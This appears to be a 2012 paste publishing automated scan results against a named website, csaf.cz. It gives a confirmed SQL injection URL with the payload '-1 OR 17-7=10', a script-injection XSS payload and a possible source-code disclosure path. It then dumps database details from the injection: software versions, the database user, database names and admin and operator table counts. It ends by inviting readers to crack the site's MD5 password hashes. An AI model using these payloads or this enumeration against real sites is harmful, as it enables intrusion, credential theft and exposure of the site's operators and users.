sroub3k

csaf.cz

Feb 2nd, 2012
*- Československá anarchistická federace -*

||| Boolean Based SQL Injection

Severity: Critical
Confirmation: Confirmed
URL: http://www.csaf.cz/teoria.php?teor_cl=-1 OR 17-7=10
Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
Parameter Name: teor_cl
Parameter Type: Querystring
Attack Pattern: -1 OR 17-7=10

||| Cross-site Scripting

Severity: Important
Confirmation: Confirmed
URL: http://www.csaf.cz/rss_adresa.php?'"--></style></script><script>alert(0x0006E3)</script>
Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
Parameter Name: Query Based
Parameter Type: FullQueryString
Attack Pattern: '"--></style></script><script>alert(0x0006E3)</script>

||| [Possible] PHP Source Code Disclosure

Severity: Medium
Confirmation: Confirmed
URL: http://www.csaf.cz/obrazky/MD4-log-584jpg
Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209

||| Info db

Target: http://www.csaf.cz/teoria.php?teor_cl=-1 OR 17-7=10
Web Server: Apache/2.2.16 (Debian)
Powered-by: PHP/5.3.21-1~dotdeb.0
DB Server: MySQL
Resp. Time(avg): 6703 ms
Current User: csaf@localhost
Sql Version: 5.1.58-1~dotdeb.1
Current DB: csaf
System User: csaf@localhost
Host Name: csaf.cz
Installation dir: /usr/
DB User: 'csaf'@'localhost'
Data Bases: information_schema, csaf

|||

csaf.phpadmin is 2

|||

csaf.admin is 1

|||

csaf.Operatori is 12

Can anyone continue decoding the next MD5 strings? :)